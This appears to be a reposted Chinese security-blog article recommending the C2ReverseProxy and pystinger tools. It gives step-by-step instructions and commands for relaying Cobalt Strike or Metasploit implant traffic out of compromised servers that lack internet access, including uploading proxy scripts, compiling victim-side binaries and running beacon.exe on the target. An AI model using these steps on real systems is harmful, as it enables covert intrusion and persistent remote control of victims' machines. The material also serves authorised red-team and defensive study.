https://github.com/Daybr4ak/C2ReverseProxy
工具原理:
利用代理转发将目标服务器上的CS的流量特征转发到CS服务端上,类似模拟一个木马在本地Listener进行上线。
官方使用说明:
1、将C2script目录下的对应文件,如proxy.ashx 以及C2ReverseServer上传到目标服务器。
2、使用C2ReverseServer建立监听端口:
./C2ReverseServer (默认为64535)
3、修改C2script目录下对应文件的PORT,与C2ReverseServer监听的端口一致。
4、本地或C2服务器上运行C2ReverseClint工具
./C2ReverseClint -t C2IP:C2ListenerPort -u http://example.com/proxy.php (传送到目标服务器上的proxy.php路径)
5、使用CobaltStrike建立本地Listener(127.0.0.1 64535)端口与C2ReverseServer建立的端口对应
6、使用建立的Listner生成可执行文件beacon.exe传至目标服务器运行
7、可以看到CobaltStrike上线。
在cmd命令行输入 CGO_ENABLED=0 GOOS=windows GOARCH=amd64 go build DReverseServer.go完成受害者端应用程序编译。
在cmd命令行输入CGO_ENABLED=0 GOOS=darwin GOARCH=amd64 go build DReverseClint.go完成CS端应用程序编译。
Staged 和 Stageless 的区别在于Staged实际功能只是程序执行后和C2 建立连接并接收真正的shellcode,然后加载执行(这里服务器不出网所以导致无法正常建立连接);而 Stageless 直接省去了接收 Payload 的步骤。
a) 本地复现php脚本需打开socket选项。
https://github.com/FunnyWolf/pystinger/
工具原理:
利用内网反向代理转发将目标服务器上的木马上线与连接、操作流量特征通过HTTP协议方式转发至C2服务端,使其目标在不出网情况下上线MSF、viper、CS。
官方使用说明:
详见https://github.com/FunnyWolf/pystinger/blob/master/readme_cn.md
pystinger复现步骤
工具可分为2块内容:
1、stinger_server程序+proxy脚本。
2、stinger_client程序+木马程序
访问下图页面代表成功。
根据stinger_server反馈的Payload端口,在CS界面新增一个Listener,并使用这个Listener新生成一个恶意木马。
原文始发于微信公众号(Beacon Tower Lab):工具推荐之不出网环境下上线CS
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论